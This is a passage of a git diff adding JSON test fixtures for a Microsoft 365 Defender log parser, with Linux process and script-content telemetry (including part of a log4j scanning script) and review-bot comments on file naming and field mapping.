big\\\\\\\")\\\\n\\\\n with zf.open(manifest_path) as f:\\\\n readline_f = functools.partial(f.readline, MAX_FILE_SIZE)\\\\n manifest_lines = list(x.decode().strip() for x in iter(readline_f, b''))\\\\n manifest = self._parse_manifest(manifest_lines)\\\\n return dict((k, v) for k, v in manifest\\\\n if not args.manifest_keys or any(m.search(k.lower()) for m in args.manifest_keys))\\\\n except:\\\\n sys.stderr.write(\\\\\\\"error while reading manifest of '{}': {}\\\\\\\\n\\\\\\\".format(self.path, traceback.format_exc()))\\\\n\\\\n if throw_on_error:\\\\n raise\\\\n\\\\n return {}\\\\n\\\\n def manifest(self, throw_on_error=False):\\\\n if not self._manifest:\\\\n self._manifest = self._read_manifest(throw_on_error)\\\\n return self._\\\"}\", \"InitiatingProcessAccountSid\": null, \"AppGuardContainerId\": null, \"InitiatingProcessSHA256\": null, \"SHA256\": \"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\", \"RemoteUrl\": null, \"ProcessCreationTime\": null, 
\"ProcessTokenElevation\": null, \"ActionType\": \"ScriptContent\", \"FileOriginUrl\": null, \"FileOriginIP\": null, \"InitiatingProcessLogonId\": 0, \"AccountSid\": null, \"RemoteDeviceName\": null, \"RegistryKey\": null, \"RegistryValueName\": null, \"RegistryValueData\": null, \"LogonId\": null, \"LocalIP\": null, \"LocalPort\": null, \"RemoteIP\": null, \"RemotePort\": null, \"ProcessId\": null, \"ProcessCommandLine\": null, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"FileSize\": null, \"InitiatingProcessFileSize\": null, \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"CreatedProcessSessionId\": null, \"IsProcessRemoteSession\": false, \"ProcessRemoteSessionDeviceName\": null, \"ProcessRemoteSessionIP\": null, \"Timestamp\": \"2024-10-22T15:09:08.851712Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}", + "event": { + "category": [ + "host" + ], + "dataset": "device_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-10-22T15:09:08.851712Z", + "action": { + "properties": { + "InitiatingProcessLogonId": "0" + }, + "type": "ScriptContent" + }, + "file": { + "hash": { + "sha256": "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08" + } + }, + "host": { + "id": "86dd1cf45142e904cb2e99c2721fac3ca198c6ca", + "name": "computer.intranet.example" + }, + "microsoft": { + "defender": { + "report": { + "id": "65306" + } + } + }, + "process": { + "parent": { + "pid": 0 + }, + "pid": 417271, + "start": 
"2024-10-22T15:09:08.624070Z" + }, + "related": { + "hash": [ + "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08" + ] + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json b/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json new file mode 100644 index 000000000..808ffdbdb --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json 
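Review bot: The new fixture's path is misspelled, `tests/test_deivce_events_2.json` ("deivce" for "device"), while its sibling added in the same commit is `test_device_process_events_2.json`; renaming it before merge keeps the test inventory consistent and greppable. The file also ends with `\ No newline at end of file`, which the prettier pass in PATCH 169 just fixed elsewhere in this series; the same trailing-newline point applies to the test_device_process_events_2.json hunk that follows. Both are cosmetic, but fixtures tend to be copied when new ones are written, so the typo will propagate if left.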
@@ -0,0 +1,82 @@ +{ + "input": { + "message": "{\"time\": \"2024-10-22T15:10:39.1954172Z\", \"tenantId\": \"793abec2-9e48-4d04-b341-59b054c49348\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceProcessEvents\", \"_TimeReceivedBySvc\": \"2024-10-22T15:10:13.8421815Z\", \"properties\": {\"InitiatingProcessSHA1\": null, \"InitiatingProcessFileSize\": null, \"InitiatingProcessMD5\": null, \"InitiatingProcessFileName\": \"\", \"InitiatingProcessParentFileName\": \"\", \"InitiatingProcessFolderPath\": null, \"InitiatingProcessCommandLine\": \"\", \"SHA1\": \"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\", \"FileSize\": 144632, \"MD5\": \"098f6bcd4621d373cade4e832627b4f6\", \"FolderPath\": \"/usr/bin/ps\", \"ProcessCommandLine\": \"/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers\", \"FileName\": \"ps\", \"ProcessId\": 423627, \"InitiatingProcessId\": 423627, \"ProcessCreationTime\": \"2024-10-22T15:09:44.594155Z\", \"DeviceName\": \"computer.intranet.example\", \"DeviceId\": \"86dd1cf45142e904cb2e99c2721fac3ca198c6ca\", \"InitiatingProcessCreationTime\": \"2024-10-22T15:09:44.59Z\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"computer\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessSignatureStatus\": \"Unknown\", \"InitiatingProcessSignerType\": \"Unknown\", \"InitiatingProcessParentId\": 0, \"ReportId\": 67417, \"InitiatingProcessParentCreationTime\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"AccountDomain\": \"computer\", \"AccountName\": \"root\", \"ProcessTokenElevation\": \"None\", \"ProcessIntegrityLevel\": null, \"AccountSid\": null, \"AppGuardContainerId\": null, \"SHA256\": \"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\", \"InitiatingProcessSHA256\": null, \"InitiatingProcessLogonId\": 0, \"LogonId\": 0, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"AccountUpn\": null, 
\"AccountObjectId\": null, \"AdditionalFields\": \"{\\\"InitiatingProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"InitiatingProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"InitiatingProcessPosixProcessGroupId\\\":423627,\\\"InitiatingProcessPosixSessionId\\\":180264,\\\"InitiatingProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"InitiatingProcessPosixRealUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"ProcessPosixProcessGroupId\\\":423627,\\\"ProcessPosixSessionId\\\":180264,\\\"ProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"ProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"ProcessPosixFileUserOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixFileGroupOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"PosixGroupId\\\":0}}\", \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, 
\"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"ProcessVersionInfoCompanyName\": null, \"ProcessVersionInfoProductName\": null, \"ProcessVersionInfoProductVersion\": null, \"ProcessVersionInfoInternalFileName\": null, \"ProcessVersionInfoOriginalFileName\": null, \"ProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"CreatedProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"IsProcessRemoteSession\": false, \"ProcessRemoteSessionDeviceName\": null, \"ProcessRemoteSessionIP\": null, \"ActionType\": \"ProcessCreated\", \"Timestamp\": \"2024-10-22T15:09:44.594155Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}" + }, + "expected": { + "message": "{\"time\": \"2024-10-22T15:10:39.1954172Z\", \"tenantId\": \"793abec2-9e48-4d04-b341-59b054c49348\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceProcessEvents\", \"_TimeReceivedBySvc\": \"2024-10-22T15:10:13.8421815Z\", \"properties\": {\"InitiatingProcessSHA1\": null, \"InitiatingProcessFileSize\": null, \"InitiatingProcessMD5\": null, \"InitiatingProcessFileName\": \"\", \"InitiatingProcessParentFileName\": \"\", \"InitiatingProcessFolderPath\": null, \"InitiatingProcessCommandLine\": \"\", \"SHA1\": \"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\", \"FileSize\": 144632, \"MD5\": \"098f6bcd4621d373cade4e832627b4f6\", \"FolderPath\": \"/usr/bin/ps\", \"ProcessCommandLine\": \"/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers\", \"FileName\": \"ps\", \"ProcessId\": 423627, \"InitiatingProcessId\": 423627, \"ProcessCreationTime\": \"2024-10-22T15:09:44.594155Z\", \"DeviceName\": \"computer.intranet.example\", \"DeviceId\": \"86dd1cf45142e904cb2e99c2721fac3ca198c6ca\", \"InitiatingProcessCreationTime\": \"2024-10-22T15:09:44.59Z\", 
\"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"computer\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessSignatureStatus\": \"Unknown\", \"InitiatingProcessSignerType\": \"Unknown\", \"InitiatingProcessParentId\": 0, \"ReportId\": 67417, \"InitiatingProcessParentCreationTime\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"AccountDomain\": \"computer\", \"AccountName\": \"root\", \"ProcessTokenElevation\": \"None\", \"ProcessIntegrityLevel\": null, \"AccountSid\": null, \"AppGuardContainerId\": null, \"SHA256\": \"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\", \"InitiatingProcessSHA256\": null, \"InitiatingProcessLogonId\": 0, \"LogonId\": 0, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"AccountUpn\": null, \"AccountObjectId\": null, \"AdditionalFields\": \"{\\\"InitiatingProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"InitiatingProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"InitiatingProcessPosixProcessGroupId\\\":423627,\\\"InitiatingProcessPosixSessionId\\\":180264,\\\"InitiatingProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"InitiatingProcessPosixRealUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"ProcessPosixProcessGroupId\\\
":423627,\\\"ProcessPosixSessionId\\\":180264,\\\"ProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"ProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"ProcessPosixFileUserOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixFileGroupOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"PosixGroupId\\\":0}}\", \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"ProcessVersionInfoCompanyName\": null, \"ProcessVersionInfoProductName\": null, \"ProcessVersionInfoProductVersion\": null, \"ProcessVersionInfoInternalFileName\": null, \"ProcessVersionInfoOriginalFileName\": null, \"ProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"CreatedProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"IsProcessRemoteSession\": false, \"ProcessRemoteSessionDeviceName\": null, \"ProcessRemoteSessionIP\": null, \"ActionType\": \"ProcessCreated\", \"Timestamp\": \"2024-10-22T15:09:44.594155Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}", + "event": { + "category": [ + "process" + ], + "dataset": "device_process_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-10-22T15:09:44.594155Z", + "action": { + "properties": { + "InitiatingProcessLogonId": "0", + "LogonId": "0" + }, + "type": "ProcessCreated" + }, + 
"file": { + "directory": "/usr/bin/ps", + "hash": { + "md5": "098f6bcd4621d373cade4e832627b4f6", + "sha1": "a94a8fe5ccb19ba61c4c0873d391e987982fbbd3", + "sha256": "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08" + }, + "name": "ps", + "size": 144632 + }, + "host": { + "id": "86dd1cf45142e904cb2e99c2721fac3ca198c6ca", + "name": "computer.intranet.example" + }, + "microsoft": { + "defender": { + "report": { + "id": "67417" + } + } + }, + "process": { + "args": [ + "--no-headers", + "-A", + "-o", + "comm,pid,pcpu,pmem,rss,etimes" + ], + "code_signature": { + "status": "Unknown", + "subject_name": "Unknown" + }, + "command_line": "/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers", + "parent": { + "pid": 0 + }, + "pid": 423627, + "start": "2024-10-22T15:09:44.594155Z", + "user": { + "domain": "computer", + "name": "root" + } + }, + "related": { + "hash": [ + "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08", + "098f6bcd4621d373cade4e832627b4f6", + "a94a8fe5ccb19ba61c4c0873d391e987982fbbd3" + ], + "user": [ + "root" + ] + }, + "user": { + "domain": "computer", + "name": "root" + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json b/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json new file mode 100644 index 000000000..a04e0e8be --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json 
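Review bot: The expected output pins `"directory": "/usr/bin/ps"`, i.e. the input's `FolderPath` copied verbatim even though here it is the full path of the binary (`FileName` is `ps`), so `file.directory` ends up holding a path that includes the file name; if Linux DeviceProcessEvents always ship FolderPath this way, the parser (outside this diff) should expose it as `file.path` and derive `file.directory` as `/usr/bin`. Likewise `process.args` is expected as `["--no-headers", "-A", "-o", "comm,pid,pcpu,pmem,rss,etimes"]`, which appears sorted rather than in command-line order and omits the executable `/bin/ps`, so detection content that relies on argument order or on the first argument may not match this event. Committing these values as expectations freezes the current behaviour rather than asserting the intended mapping; if it is deliberate it deserves a note in the parser, otherwise the fixture should be regenerated once the mapping is corrected.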
@@ -0,0 +1,52 @@ +{ + "input": { + "message": "{\"time\": \"2024-10-22T15:10:32.7309209Z\", \"tenantId\": \"793abec2-9e48-4d04-b341-59b054c49348\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceEvents\", \"_TimeReceivedBySvc\": \"2024-10-22T15:09:55.6358865Z\", \"properties\": {\"DeviceId\": \"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\", \"DeviceName\": \"computer.intranet.example\", \"ReportId\": 67420, \"InitiatingProcessId\": 423638, \"InitiatingProcessCreationTime\": \"2024-10-22T15:09:47.165481Z\", \"InitiatingProcessCommandLine\": null, \"InitiatingProcessParentFileName\": null, \"InitiatingProcessParentId\": 0, \"InitiatingProcessParentCreationTime\": null, \"InitiatingProcessSHA1\": null, \"InitiatingProcessMD5\": null, \"InitiatingProcessFileName\": null, \"InitiatingProcessFolderPath\": null, \"InitiatingProcessAccountName\": null, \"InitiatingProcessAccountDomain\": null, \"SHA1\": null, \"MD5\": null, \"FileName\": null, \"FolderPath\": null, \"AccountName\": null, \"AccountDomain\": null, \"AdditionalFields\": \"{\\\"ScriptContent\\\":\\\"# sudo python3 open_files.py --ScriptName open_files.py --id log4j_handlersV2 --filter-env LOG4J_FORMAT_MSG_NO_LOOKUPS=true --filter-name \\\\\\\"log4j,LOG4J,spring-core\\\\\\\" --filter-command \\\\\\\"java,javaw\\\\\\\" --manifest-path \\\\\\\"META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties\\\\\\\" --marker-path /var/opt/microsoft/mdatp/wdavedr/log4jMitigationApplied --collect-dirlist /log4j/core/lookup/JndiLookup.class,log4j-,spring-core-\\\\n# sudo python2 open_files.py --ScriptName open_files.py --id log4j_handlersV2 --filter-env LOG4J_FORMAT_MSG_NO_LOOKUPS=true --filter-name \\\\\\\"log4j,LOG4J,spring-core\\\\\\\" --filter-command \\\\\\\"java,javaw\\\\\\\" --manifest-path \\\\\\\"META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties\\\\\\\" --marker-path /var/opt/microsoft/mdatp/wdavedr/log4jMitigationApplied --collect-dirlist 
/log4j/core/lookup/JndiLookup.class,log4j-,spring-core-\\\\n# sudo rm /opt/microsoft/mdatp/resources/cache/log4j_handlersV2.json \\\\n\\\\nfrom genericpath import isdir\\\\nimport os\\\\nimport re\\\\nimport sys\\\\nimport json\\\\nfrom datetime import datetime as dt\\\\nimport zipfile\\\\nimport string\\\\nimport argparse\\\\nimport traceback\\\\nimport functools\\\\nimport itertools\\\\nimport subprocess as sb\\\\n\\\\nMAX_FILE_SIZE = 1024 * 1024 # 1MB\\\\nMANIFEST_OLD_PATH = \\\\\\\"META-INF/MANIFEST.MF\\\\\\\"\\\\n\\\\ndef take(n, l):\\\\n for i, item in enumerate(l):\\\\n if i > n:\\\\n break\\\\n yield item\\\\n\\\\nclass Jar:\\\\n def __init__(self, path):\\\\n self.path = path\\\\n self._manifest = {}\\\\n self._dirlist = []\\\\n\\\\n def _parse_manifest(self, lines):\\\\n version_indication = \\\\\\\"version=\\\\\\\"\\\\n version_lines = [line for line in lines if line.startswith(version_indication)]\\\\n\\\\n if len(version_lines) > 0:\\\\n version = version_lines[0][len(version_indication):]\\\\n yield 'Version', version.strip()\\\\n\\\\n field_names = ['Specification-Version', 'Specification-Title', 'Specification-Vendor', 'Implementation-Version', 'Implementation-Title', 'Implementation-Vendor']\\\\n for line in lines:\\\\n if any(line.startswith(field_name) for field_name in field_names):\\\\n key, value = line.split(':')\\\\n yield key.strip(), value.strip()\\\\n\\\\n def _open(self):\\\\n if not zipfile.is_zipfile(self.path):\\\\n raise ValueError(\\\\\\\"path is not a zip file: {}\\\\\\\".format(self.path))\\\\n return zipfile.ZipFile(self.path)\\\\n\\\\n def _read_dirlist(self):\\\\n with self._open() as zf:\\\\n filenames = dict(p for p in zf.namelist())\\\\n return [f for f in filenames if any(r.search(f.lower()) for r in args.dirlist)]\\\\n\\\\n\\\\n\\\\n def _get_manifest_path(self, zf):\\\\n for path in [args.manifest_path, MANIFEST_OLD_PATH]:\\\\n if path in zf.namelist():\\\\n return path\\\\n\\\\n def _read_manifest(self, 
throw_on_error=False):\\\\n try:\\\\n with self._open() as zf:\\\\n manifest_path = self._get_manifest_path(zf)\\\\n if not manifest_path:\\\\n # Not found manifest file\\\\n return {}\\\\n\\\\n manifest_info = zf.getinfo(manifest_path)\\\\n if manifest_info.file_size > MAX_FILE_SIZE:\\\\n raise IOError(\\\\\\\"manifest file is too big\\\\\\\")\\\\n\\\\n with zf.open(manifest_path) as f:\\\\n readline_f = functools.partial(f.readline, MAX_FILE_SIZE)\\\\n manifest_lines = list(x.decode().strip() for x in iter(readline_f, b''))\\\\n manifest = self._parse_manifest(manifest_lines)\\\\n return dict((k, v) for k, v in manifest\\\\n if not args.manifest_keys or any(m.search(k.lower()) for m in args.manifest_keys))\\\\n except:\\\\n sys.stderr.write(\\\\\\\"error while reading manifest of '{}': {}\\\\\\\\n\\\\\\\".format(self.path, traceback.format_exc()))\\\\n\\\\n if throw_on_error:\\\\n raise\\\\n\\\\n return {}\\\\n\\\\n def manifest(self, throw_on_error=False):\\\\n if not self._manifest:\\\\n self._manifest = self._read_manifest(throw_on_error)\\\\n return self._\\\"}\", \"InitiatingProcessAccountSid\": null, \"AppGuardContainerId\": null, \"InitiatingProcessSHA256\": null, \"SHA256\": \"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\", \"RemoteUrl\": null, \"ProcessCreationTime\": null, \"ProcessTokenElevation\": null, \"ActionType\": \"ScriptContent\", \"FileOriginUrl\": null, \"FileOriginIP\": null, \"InitiatingProcessLogonId\": 0, \"AccountSid\": null, \"RemoteDeviceName\": null, \"RegistryKey\": null, \"RegistryValueName\": null, \"RegistryValueData\": null, \"LogonId\": null, \"LocalIP\": null, \"LocalPort\": null, \"RemoteIP\": null, \"RemotePort\": null, \"ProcessId\": null, \"ProcessCommandLine\": null, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"FileSize\": null, \"InitiatingProcessFileSize\": null, \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": 
null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"CreatedProcessSessionId\": null, \"IsProcessRemoteSession\": false, \"ProcessRemoteSessionDeviceName\": null, \"ProcessRemoteSessionIP\": null, \"Timestamp\": \"2024-10-22T15:09:47.246794Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}" + }, + "expected": { + "message": "{\"time\": \"2024-10-22T15:10:32.7309209Z\", \"tenantId\": \"793abec2-9e48-4d04-b341-59b054c49348\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceEvents\", \"_TimeReceivedBySvc\": \"2024-10-22T15:09:55.6358865Z\", \"properties\": {\"DeviceId\": \"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\", \"DeviceName\": \"computer.intranet.example\", \"ReportId\": 67420, \"InitiatingProcessId\": 423638, \"InitiatingProcessCreationTime\": \"2024-10-22T15:09:47.165481Z\", \"InitiatingProcessCommandLine\": null, \"InitiatingProcessParentFileName\": null, \"InitiatingProcessParentId\": 0, \"InitiatingProcessParentCreationTime\": null, \"InitiatingProcessSHA1\": null, \"InitiatingProcessMD5\": null, \"InitiatingProcessFileName\": null, \"InitiatingProcessFolderPath\": null, \"InitiatingProcessAccountName\": null, \"InitiatingProcessAccountDomain\": null, \"SHA1\": null, \"MD5\": null, \"FileName\": null, \"FolderPath\": null, \"AccountName\": null, \"AccountDomain\": null, \"AdditionalFields\": \"{\\\"ScriptContent\\\":\\\"# sudo python3 open_files.py --ScriptName open_files.py --id log4j_handlersV2 --filter-env LOG4J_FORMAT_MSG_NO_LOOKUPS=true --filter-name \\\\\\\"log4j,LOG4J,spring-core\\\\\\\" --filter-command 
\\\\\\\"java,javaw\\\\\\\" --manifest-path \\\\\\\"META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties\\\\\\\" --marker-path /var/opt/microsoft/mdatp/wdavedr/log4jMitigationApplied --collect-dirlist /log4j/core/lookup/JndiLookup.class,log4j-,spring-core-\\\\n# sudo python2 open_files.py --ScriptName open_files.py --id log4j_handlersV2 --filter-env LOG4J_FORMAT_MSG_NO_LOOKUPS=true --filter-name \\\\\\\"log4j,LOG4J,spring-core\\\\\\\" --filter-command \\\\\\\"java,javaw\\\\\\\" --manifest-path \\\\\\\"META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties\\\\\\\" --marker-path /var/opt/microsoft/mdatp/wdavedr/log4jMitigationApplied --collect-dirlist /log4j/core/lookup/JndiLookup.class,log4j-,spring-core-\\\\n# sudo rm /opt/microsoft/mdatp/resources/cache/log4j_handlersV2.json \\\\n\\\\nfrom genericpath import isdir\\\\nimport os\\\\nimport re\\\\nimport sys\\\\nimport json\\\\nfrom datetime import datetime as dt\\\\nimport zipfile\\\\nimport string\\\\nimport argparse\\\\nimport traceback\\\\nimport functools\\\\nimport itertools\\\\nimport subprocess as sb\\\\n\\\\nMAX_FILE_SIZE = 1024 * 1024 # 1MB\\\\nMANIFEST_OLD_PATH = \\\\\\\"META-INF/MANIFEST.MF\\\\\\\"\\\\n\\\\ndef take(n, l):\\\\n for i, item in enumerate(l):\\\\n if i > n:\\\\n break\\\\n yield item\\\\n\\\\nclass Jar:\\\\n def __init__(self, path):\\\\n self.path = path\\\\n self._manifest = {}\\\\n self._dirlist = []\\\\n\\\\n def _parse_manifest(self, lines):\\\\n version_indication = \\\\\\\"version=\\\\\\\"\\\\n version_lines = [line for line in lines if line.startswith(version_indication)]\\\\n\\\\n if len(version_lines) > 0:\\\\n version = version_lines[0][len(version_indication):]\\\\n yield 'Version', version.strip()\\\\n\\\\n field_names = ['Specification-Version', 'Specification-Title', 'Specification-Vendor', 'Implementation-Version', 'Implementation-Title', 'Implementation-Vendor']\\\\n for line in lines:\\\\n if any(line.startswith(field_name) for field_name in 
field_names):\\\\n key, value = line.split(':')\\\\n yield key.strip(), value.strip()\\\\n\\\\n def _open(self):\\\\n if not zipfile.is_zipfile(self.path):\\\\n raise ValueError(\\\\\\\"path is not a zip file: {}\\\\\\\".format(self.path))\\\\n return zipfile.ZipFile(self.path)\\\\n\\\\n def _read_dirlist(self):\\\\n with self._open() as zf:\\\\n filenames = dict(p for p in zf.namelist())\\\\n return [f for f in filenames if any(r.search(f.lower()) for r in args.dirlist)]\\\\n\\\\n\\\\n\\\\n def _get_manifest_path(self, zf):\\\\n for path in [args.manifest_path, MANIFEST_OLD_PATH]:\\\\n if path in zf.namelist():\\\\n return path\\\\n\\\\n def _read_manifest(self, throw_on_error=False):\\\\n try:\\\\n with self._open() as zf:\\\\n manifest_path = self._get_manifest_path(zf)\\\\n if not manifest_path:\\\\n # Not found manifest file\\\\n return {}\\\\n\\\\n manifest_info = zf.getinfo(manifest_path)\\\\n if manifest_info.file_size > MAX_FILE_SIZE:\\\\n raise IOError(\\\\\\\"manifest file is too big\\\\\\\")\\\\n\\\\n with zf.open(manifest_path) as f:\\\\n readline_f = functools.partial(f.readline, MAX_FILE_SIZE)\\\\n manifest_lines = list(x.decode().strip() for x in iter(readline_f, b''))\\\\n manifest = self._parse_manifest(manifest_lines)\\\\n return dict((k, v) for k, v in manifest\\\\n if not args.manifest_keys or any(m.search(k.lower()) for m in args.manifest_keys))\\\\n except:\\\\n sys.stderr.write(\\\\\\\"error while reading manifest of '{}': {}\\\\\\\\n\\\\\\\".format(self.path, traceback.format_exc()))\\\\n\\\\n if throw_on_error:\\\\n raise\\\\n\\\\n return {}\\\\n\\\\n def manifest(self, throw_on_error=False):\\\\n if not self._manifest:\\\\n self._manifest = self._read_manifest(throw_on_error)\\\\n return 